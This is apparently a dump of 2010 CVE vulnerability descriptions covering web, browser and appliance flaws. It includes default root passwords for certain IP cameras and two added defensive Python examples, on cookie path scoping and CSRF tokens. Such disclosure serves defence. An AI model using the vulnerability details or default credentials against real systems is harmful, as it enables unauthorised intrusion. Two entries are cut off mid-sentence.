[CVE-2010-4396] Cross-zone scripting vulnerability in the HandleAction method in a certain ActiveX control in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, and RealPlayer Enterprise 2.1.2 allows remote attackers to inject arbitrary web script or HTML in the Local Zone by specifying a local file in a NavigateToURL action, as demonstrated by a local skin file.
[CVE-2010-4394] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.5 allows remote web servers to execute arbitrary code via a long Server header in a response to an HTTP request that occurs during parsing of a RealPix file.
[CVE-2010-4367] awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.
[CVE-2010-4366] Multiple cross-site scripting (XSS) vulnerabilities in forum_new_topic.php in Chameleon Social Networking allow remote attackers to inject arbitrary web script or HTML via the (1) thread_title and (2) thread_description parameters in a message.
[CVE-2010-4362] Multiple SQL injection vulnerabilities in MicroNetsoft RV Dealer Website allow remote attackers to execute arbitrary SQL commands via the (1) selStock parameter to search.asp and the (2) orderBy parameter to showAlllistings.asp.
[CVE-2010-4361] Cross-site scripting (XSS) vulnerability in url-gateway.php in Jurpopage 0.2.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-4358] Multiple cross-site scripting (XSS) vulnerabilities in gb.cgi in MRCGIGUY (MCG) Guestbook 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, (3) website, and (4) message parameters.
[CVE-2010-4355] Cross-site scripting (XSS) vulnerability in DaDaBIK before 4.3 beta2, when the insert or edit feature is enabled, allows remote authenticated users to inject arbitrary web script or HTML via the select_single parameter.
[CVE-2010-4348] Cross-site scripting (XSS) vulnerability in admin/upgrade_unattended.php in MantisBT before 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the db_type parameter, related to an unsafe call by MantisBT to a function in the ADOdb Library for PHP.
[CVE-2010-4339] Cross-site scripting (XSS) vulnerability in Hypermail 2.2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted From address, which is not properly handled when indexing messages.
[CVE-2010-4331] Multiple cross-site scripting (XSS) vulnerabilities in Seo Panel 2.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) default_news or (2) sponsors cookies, which are not properly handled by (a) controllers/index.ctrl.php or (b) controllers/settings.ctrl.php.
[CVE-2010-4329] Cross-site scripting (XSS) vulnerability in the PMA_linkOrButton function in libraries/common.lib.php in the database (db) search script in phpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1 allows remote attackers to inject arbitrary web script or HTML via a crafted request.
[CVE-2010-4324] Cross-site scripting (XSS) vulnerability in the Approval Form in the User Application in the Roles Based Provisioning Module 3.7.0 before 370D in Novell Identity Manager (aka IDM) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4322] Cross-site scripting (XSS) vulnerability in gwtTeaming.rpc in Novell Vibe OnPrem 3 BETA allows remote authenticated users to inject arbitrary web script or HTML via the Micro Blog (aka What Are You Working On?) field.
[CVE-2010-4284] SQL injection vulnerability in the authentication form in the integrated web server in the Data Management Server (DMS) before 1.4.3 in Samsung Integrated Management System allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2010-4277] Cross-site scripting (XSS) vulnerability in lembedded-video.php in the Embedded Video plugin 4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the content parameter to wp-admin/post.php.
[CVE-2010-4276] Cross-site scripting (XSS) vulnerability in the lz_tracking_set_sessid function in templates/jscript/jstrack.tpl in LiveZilla 3.2.0.2 allows remote attackers to inject arbitrary web script or HTML via the livezilla parameter in a track action to server.php.
[CVE-2010-4275] Multiple cross-site scripting (XSS) vulnerabilities in Radius Manager 3.8.0 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) name or (2) descr parameter in an (a) update_usergroup or a (b) store_nas action to admin.php.
[CVE-2010-4246] Multiple cross-site scripting (XSS) vulnerabilities in graph.php in pfSense 1.2.3 and 2 beta 4 allow remote attackers to inject arbitrary web script or HTML via the (1) ifnum or (2) ifname parameter, a different vulnerability than CVE-2008-1182.
[CVE-2010-4234] The web server on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to cause a denial of service (device reboot) via a large number of requests in a short time interval.
[CVE-2010-4233] The Linux installation on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 has a default password of m for the root account, and a default password of merlin for the mg3500 account, which makes it easier for remote attackers to obtain access via the TELNET interface.
[CVE-2010-4220] Cross-site scripting (XSS) vulnerability in the Integrated Solution Console in the Administrative Console component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related in part to "URL injection."
[CVE-2010-4219] Cross-site scripting (XSS) vulnerability in SemanticTagService.js in IBM WebSphere Portal 6.1.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2010-4218] Unspecified vulnerability in Web Services in IBM ENOVIA 6 has unknown impact and attack vectors, related to a system that becomes "exposed to the internet."
[CVE-2010-4212] The USAA application 3.0 for Android stores a mirror image of each visited web page, which might allow physically proximate attackers to obtain sensitive banking information by reading application data.
[CVE-2010-4211] The PayPal app before 3.0.1 for iOS does not verify that the server hostname matches the domain name of the subject of an X.509 certificate, which allows man-in-the-middle attackers to spoof a PayPal web server via an arbitrary certificate.
[CVE-2010-4209] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.8.0 through 2.8.1, as used in Bugzilla 3.7.1 through 3.7.3 and 4.1, allows remote attackers to inject arbitrary web script or HTML via vectors related to swfstore/swfstore.swf.
[CVE-2010-4208] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.5.0 through 2.8.1, as used in Bugzilla, Moodle, and other products, allows remote attackers to inject arbitrary web script or HTML via vectors related to uploader/assets/uploader.swf.
[CVE-2010-4207] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.8.1, as used in Bugzilla, Moodle, and other products, allows remote attackers to inject arbitrary web script or HTML via vectors related to charts/assets/charts.swf.
[CVE-2010-4206] Array index error in the FEBlend::apply function in WebCore/platform/graphics/filters/FEBlend.cpp in WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted SVG document, related to effects in the application of filters.
[CVE-2010-4204] WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, accesses a frame object after this object has been destroyed, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2010-4203] WebM libvpx (aka the VP8 Codec SDK) before 0.9.5, as used in Google Chrome before 7.0.517.44, allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via invalid frames.
[CVE-2010-4198] WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, does not properly handle large text areas, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted HTML document.
[CVE-2010-4197] Use-after-free vulnerability in WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving text editing.
[CVE-2010-4183] Multiple cross-site scripting (XSS) vulnerabilities in HTML Purifier before 4.1.0, when Internet Explorer is used, allow remote attackers to inject arbitrary web script or HTML via a crafted (1) background-image, (2) background, or (3) font-family Cascading Style Sheets (CSS) property, a different vulnerability than CVE-2010-2479.
[CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
[CVE-2010-4166] Multiple SQL injection vulnerabilities in Joomla! 1.5.x before 1.5.22 allow remote attackers to execute arbitrary SQL commands via (1) the filter_order parameter in a com_weblinks category action to index.php, (2) the filter_order_Dir parameter in a com_weblinks category action to index.php, or (3) the filter_order_Dir parameter in a com_messages action to administrator/index.php.
[CVE-2010-4155] Multiple cross-site scripting (XSS) vulnerabilities in eXV2 CMS 2.10 allow remote attackers to inject arbitrary web script or HTML via the (1) rssfeedURL parameter to manual/caferss/example.php and the sumb parameter to (2) modules/news/archive.php, (3) modules/news/topics.php, and (4) modules/contact/index.php, different vectors than CVE-2007-1965.
[CVE-2010-4149] Directory traversal vulnerability in FreshWebMaster Fresh FTP 5.36, 5.37, and possibly earlier, allows remote FTP servers to write arbitrary files via a "..\" (dot dot backslash) in a filename. NOTE: some of these details are obtained from third party information.
[CVE-2010-4146] Cross-site scripting (XSS) vulnerability in Attachmate Reflection for the Web 2008 R2 (builds 10.1.569 and earlier), 2008 R1, and 9.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4145] Kisisel Radyo Script stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for sevvo/eco23.mdb.
[CVE-2010-4120] Multiple cross-site scripting (XSS) vulnerabilities in the TAM console in IBM Tivoli Access Manager for e-business 6.1.0 before 6.1.0-TIV-TAM-FP0006 allow remote attackers to inject arbitrary web script or HTML via (1) the parm1 parameter to ivt/ivtserver, or the method parameter to (2) acl, (3) domain, (4) group, (5) gso, (6) gsogroup, (7) os, (8) pop, (9) rule, (10) user, or (11) webseal in ibm/wpm/.
[CVE-2010-4114] Cross-site scripting (XSS) vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.5x, 7.5x, and 7.6x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4113] Stack-based buffer overflow in HP Power Manager (HPPM) before 4.3.2 allows remote attackers to execute arbitrary code via a long Login variable to the management web server.
[CVE-2010-4111] Cross-site scripting (XSS) vulnerability in HP Insight Diagnostics Online Edition before 8.5.1.3712 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4109] Cross-site scripting (XSS) vulnerability in the Contacts Application in HP Palm webOS before 2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted vCard file.
[CVE-2010-4101] Cross-site scripting (XSS) vulnerability in HP Insight Recovery before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4097] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Aardvark Topsites PHP 5.2.0 and 5.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) mail, (2) title, (3) u, and (4) url parameters. NOTE: the q parameter is already covered by CVE-2009-2302.
[CVE-2010-4092] Use-after-free vulnerability in an unspecified compatibility component in Adobe Shockwave Player before 11.5.9.620 allows user-assisted remote attackers to execute arbitrary code via a crafted web site, related to the Shockwave Settings window and an unloaded library. NOTE: some of these details are obtained from third party information.
[CVE-2010-4072] The copy_shmid_to_user function in ipc/shm.c in the Linux kernel before 2.6.37-rc1 does not initialize a certain structure, which allows local users to obtain potentially sensitive information from kernel stack memory via vectors related to the shmctl system call and the "old shm interface."
[CVE-2010-4071] Cross-site scripting (XSS) vulnerability in AgentTicketZoom in OTRS 2.4.x before 2.4.9, when RichText is enabled, allows remote attackers to inject arbitrary web script or HTML via JavaScript in an HTML e-mail.
[CVE-2010-4048] Opera before 10.63 allows user-assisted remote web servers to cause a denial of service (application crash) by sending a redirect during the saving of a file.
[CVE-2010-4047] Opera before 10.63 does not properly select the security context of JavaScript code associated with an error page, which allows user-assisted remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site.
[CVE-2010-4045] Opera before 10.63 does not properly restrict web script in unspecified circumstances involving reloads and redirects, which allows remote attackers to spoof the Address Bar, conduct cross-site scripting (XSS) attacks, and possibly execute arbitrary code by leveraging the ability of a script to interact with a web page from (1) a different domain or (2) a different security context.
[CVE-2010-4038] The Web Sockets implementation in Google Chrome before 7.0.517.41 does not properly handle a shutdown action, which allows remote attackers to cause a denial of service (application crash) via unspecified vectors.
[CVE-2010-4030] Cross-site scripting (XSS) vulnerability in HP Insight Control Performance Management before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4028] Unspecified vulnerability in LoadRunner Web Tours 9.10 in HP LoadRunner 9.1 and earlier allows remote attackers to cause a denial of service, and possibly obtain sensitive information or modify data, via unknown vectors.
[CVE-2010-4027] Unspecified vulnerability in the camera application in HP Palm webOS 1.4.1 allows local users to overwrite arbitrary files via unknown vectors.
[CVE-2010-4026] Unspecified vulnerability in the service API in HP Palm webOS 1.4.1 allows local users to gain privileges by leveraging the ability to perform certain service calls.
[CVE-2010-4025] Unspecified vulnerability in Doc Viewer in HP Palm webOS 1.4.1 allows remote attackers to execute arbitrary code via a crafted document, as demonstrated by a Word document.
[CVE-2010-4023] Cross-site scripting (XSS) vulnerability in HP Insight Control Power Management before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3994] Cross-site scripting (XSS) vulnerability in HP Version Control Repository Manager (VCRM) before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3991] Cross-site scripting (XSS) vulnerability in HP Insight Control Server Migration before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3987] Cross-site scripting (XSS) vulnerability in HP Insight Control Virtual Machine Management before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3985] Cross-site scripting (XSS) vulnerability in HP Operations Orchestration before 9.0, when Internet Explorer 6.0 is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3981] Cross-site scripting (XSS) vulnerability in SAP BusinessObjects Enterprise XI 3.2 allows remote attackers to inject arbitrary web script or HTML via the ServiceClass field to the Edit Service Parameters page.
[CVE-2010-3977] Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.
[CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability."
[CVE-2010-3936] Cross-site scripting (XSS) vulnerability in Signurl.asp in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS in Signurl.asp Vulnerability."
[CVE-2010-3931] Cross-site scripting (XSS) vulnerability in multiple Rocomotion products, including P board 1.18 and other versions, P forum 1.30 and earlier, P up board 1.38 and other versions, P diary R 1.13 and earlier, P link 1.11 and earlier, P link compact 1.04 and earlier, pplog 3.31 and earlier, pplog2 3.37 and earlier, PM bbs 1.07 and earlier, PM up bbs 1.08 and earlier, and PM forum 1.18 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2010-3926] Multiple cross-site scripting (XSS) vulnerabilities in Shop.cgi in SGX-SP Final before 11.00 and SGX-SP Final NE before 11.00 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3921] Cross-site scripting (XSS) vulnerability in Movable Type 4.x before 4.35 and 5.x before 5.04 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3919] Fenrir Grani 4.5 and earlier does not prevent interaction between web script and the clipboard, which allows remote attackers to read or modify the clipboard contents via a crafted web site.
[CVE-2010-3918] Fenrir Sleipnir 2.9.6 and earlier does not prevent interaction between web script and the clipboard, which allows remote attackers to read or modify the clipboard contents via a crafted web site.
[CVE-2010-3911] Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM before 5.2.1 allow remote attackers to inject arbitrary web script or HTML via (1) the username (aka default_user_name) field or (2) the password field in a Users Login action to index.php, or (3) the label parameter in a Settings GetFieldInfo action to index.php, related to modules/Settings/GetFieldInfo.php.
[CVE-2010-3906] Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) f and (2) fp parameters.
[CVE-2010-3905] The password reset feature in the administrator interface for Eucalyptus 2.0.0 and 2.0.1 does not perform authentication, which allows remote attackers to gain privileges by sending password reset requests for other users.
[CVE-2010-3902] OpenConnect before 2.26 places the webvpn cookie value in the debugging output, which might allow remote attackers to obtain sensitive information by reading this output, as demonstrated by output posted to the public openconnect-devel mailing list.
[CVE-2010-3900] Midori before 0.2.5, when WebKitGTK+ before 1.1.14 or LibSoup before 2.29.91 is used, does not verify X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary https web sites via a crafted server certificate, a related issue to CVE-2010-3312.
[CVE-2010-3899] IBM OmniFind Enterprise Edition 8.x and 9.x performs web crawls with an unlimited recursion depth, which allows remote web servers to cause a denial of service (infinite loop) via a crafted series of documents.
[CVE-2010-3898] IBM OmniFind Enterprise Edition 8.x and 9.x does not properly restrict the cookie path of administrator (aka ESAdmin) cookies, which might allow remote attackers to bypass authentication by leveraging access to other pages on the web site.
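The entry above turns on how a browser scopes a cookie by its Path attribute. The following is an added example written for this page (it is not vulscan, VulDB or IBM code) that implements the RFC 6265 default-path and path-match rules and shows which pages on the same host receive an admin cookie when it is issued with Path=/, with Path=/ESAdmin, and with no Path at all. The cookie name "ESAdmin" mirrors the entry; the cookie value and the request paths other than the two ESAdmin ones are constructed for the demo.

```python
# Request paths used in the demo: the two ESAdmin ones mirror the interface named
# in the entry above; "/search/index.jsp" and "/ESAdminHelp/index.html" are
# hypothetical pages on the same host.
PAGES = [
    "/ESAdmin/login.do",
    "/ESAdmin/security.do",
    "/search/index.jsp",
    "/ESAdminHelp/index.html",
]


def default_path(uri_path: str) -> str:
    """RFC 6265 section 5.1.4: the path a cookie gets when Set-Cookie carries no Path attribute."""
    if not uri_path or not uri_path.startswith("/"):
        return "/"
    last = uri_path.rfind("/")
    if last == 0:
        return "/"
    return uri_path[:last]


def path_matches(request_path: str, cookie_path: str) -> bool:
    """RFC 6265 path-match: prefix match, but only on a segment boundary."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    if cookie_path.endswith("/"):
        return True
    return request_path[len(cookie_path)] == "/"


def cookie_path_from_header(set_cookie: str, set_on_uri_path: str) -> str:
    """Effective Path of a Set-Cookie header issued in the response to set_on_uri_path."""
    path_attr = None
    for attr in set_cookie.split(";")[1:]:
        name, _, value = attr.strip().partition("=")
        if name.lower() == "path" and value.startswith("/"):
            path_attr = value
    return path_attr or default_path(set_on_uri_path)


def pages_receiving(set_cookie: str, set_on_uri_path: str, pages=PAGES):
    """Request paths on the same host to which the browser would attach the cookie."""
    cookie_path = cookie_path_from_header(set_cookie, set_on_uri_path)
    return [p for p in pages if path_matches(p, cookie_path)]


if __name__ == "__main__":
    for header in ("ESAdmin=s3cr3t; Path=/; HttpOnly",
                   "ESAdmin=s3cr3t; Path=/ESAdmin; HttpOnly",
                   "ESAdmin=s3cr3t; HttpOnly"):
        print(header, "->", pages_receiving(header, "/ESAdmin/login.do"))
```

Note the segment-boundary rule: a cookie scoped to /ESAdmin is not sent to /ESAdminHelp/, so narrowing the path does not accidentally leak it to sibling applications whose names merely share a prefix.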
[CVE-2010-3894] Stack-based buffer overflow in the Java_com_ibm_es_oss_CryptionNative_ESEncrypt function in /opt/IBM/es/lib/libffq.cryptionjni.so in the login form in the administration interface in IBM OmniFind Enterprise Edition before 8.5 FP6 allows remote attackers to execute arbitrary code via a long password.
[CVE-2010-3893] The administrator interface in IBM OmniFind Enterprise Edition 8.x and 9.x does not restrict use of a session ID (aka SID) value to a single IP address, which allows remote attackers to perform arbitrary administrative actions by leveraging cookie theft, related to a "session impersonation" issue.
[CVE-2010-3891] Cross-site request forgery (CSRF) vulnerability in ESAdmin/security.do in the administrator interface in IBM OmniFind Enterprise Edition before 9.1 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a saveNewUser action.
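The entry above describes a state-changing admin action (saveNewUser) that can be triggered by a cross-site request because nothing in the request proves it came from the application's own page. Below is an added example written for this page (not vulscan, VulDB or IBM code) of the standard countermeasure: an HMAC-based anti-CSRF token bound to the caller's session and checked on every POST. The handler, the session identifiers and the form fields are constructed for the demo; the server key is generated at import time here, whereas a real deployment loads it from configuration.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated at import for the demo (a real server loads it from config).
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Token = nonce.HMAC(key, session_id:nonce). Binding the MAC to the session id
    means a token the attacker obtains for their own session is useless against a victim."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def save_new_user(request: dict, session_id: str) -> int:
    """Simulated handler for a state-changing admin action (hypothetical, constructed for
    the demo). `request` is a dict with 'method' and 'form'; session_id is whatever the
    session cookie resolved to. Returns an HTTP status code."""
    if request.get("method") != "POST":
        return 405
    token = request.get("form", {}).get("csrf_token", "")
    if not verify_csrf_token(session_id, token):
        return 403
    # ... create the user here ...
    return 200


if __name__ == "__main__":
    victim = "sess-victim"
    token = issue_csrf_token(victim)
    print("legitimate form post:", save_new_user({"method": "POST", "form": {"username": "ops", "csrf_token": token}}, victim))
    # A cross-site auto-submitting form rides the victim's session cookie but cannot read the token.
    print("forged cross-site post:", save_new_user({"method": "POST", "form": {"username": "backdoor"}}, victim))
```

The forged request fails even though the browser attached the victim's session cookie, because the attacker's page can neither read the token from the victim's page nor compute a valid MAC for the victim's session.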
[CVE-2010-3882] Multiple cross-site scripting (XSS) vulnerabilities in CMS Made Simple 1.7.1 and earlier allow remote attackers to inject arbitrary web script or HTML via input to the (1) Add Pages, (2) Add Global Content, (3) Edit Global Content, (4) Add Article, (5) Add Category, (6) Add Field Definition, or (7) Add Shortcut module.
[CVE-2010-3871] Cross-site scripting (XSS) vulnerability in blocktype/groupviews/theme/raw/groupviews.tpl in Mahara before 1.3.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2010-3841] Multiple cross-site scripting (XSS) vulnerabilities in lib/TWiki.pm in TWiki before 5.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the rev parameter to the view script or (2) the query string to the login script.
[CVE-2010-3829] WebKit in Apple iOS before 4.2 allows remote attackers to bypass the remote image loading setting in Mail via an HTML LINK element with a DNS prefetching property, as demonstrated by an HTML e-mail message that uses a LINK element for X-Confirm-Reading-To functionality, a related issue to CVE-2010-3813.
[CVE-2010-3826] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of colors in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3824] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving SVG use elements.
[CVE-2010-3823] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving Geolocation objects. NOTE: this might overlap CVE-2010-3415.
[CVE-2010-3822] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses an uninitialized pointer during processing of Cascading Style Sheets (CSS) counter styles, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3821] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the :first-letter pseudo-element in a Cascading Style Sheets (CSS) token sequence, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
[CVE-2010-3820] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses uninitialized memory during processing of editable elements, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3819] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) boxes, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3818] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving inline text boxes.
[CVE-2010-3817] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) 3D transforms, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3816] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars.
[CVE-2010-3813] The WebCore::HTMLLinkElement::process function in WebCore/html/HTMLLinkElement.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4
[CVE-2010-3812] Integer overflow in the Text::wholeText method in dom/Text.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4
[CVE-2010-3811] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element attributes.
[CVE-2010-3810] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the History object, which allows remote attackers to spoof the location bar's URL or add URLs to the history via a cross-origin attack.
[CVE-2010-3809] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of inline styling, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3808] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of editing commands, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site.
[CVE-2010-3805] Integer underflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving WebSockets. NOTE: this may overlap CVE-2010-3254.
[CVE-2010-3804] The JavaScript implementation in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, uses a weak algorithm for generating values of random numbers, which makes it easier for remote attackers to track a user by predicting a value, a related issue to CVE-2008-5913 and CVE-2010-3171.
[CVE-2010-3803] Integer overflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string.
[CVE-2010-3797] Cross-site scripting (XSS) vulnerability in Wiki Server in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3774] The NS_SecurityCompareURIs function in netwerk/base/public/nsNetUtil.h in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11, does not properly handle (1) about:neterror and (2) about:certerror pages, which allows remote attackers to spoof the location bar via a crafted web site.
[CVE-2010-3770] Multiple cross-site scripting (XSS) vulnerabilities in the rendering engine in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11, allow remote attackers to inject arbitrary web script or HTML via (1) x-mac-arabic, (2) x-mac-farsi, or (3) x-mac-hebrew characters that may be converted to angle brackets during rendering.
[CVE-2010-3763] Cross-site scripting (XSS) vulnerability in core/summary_api.php in MantisBT before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via the Summary field, a different vector than CVE-2010-3303.
[CVE-2010-3730] Google Chrome before 6.0.472.62 does not properly use information about the origin of a document to manage properties, which allows remote attackers to have an unspecified impact via a crafted web site, related to a "property pollution" issue.
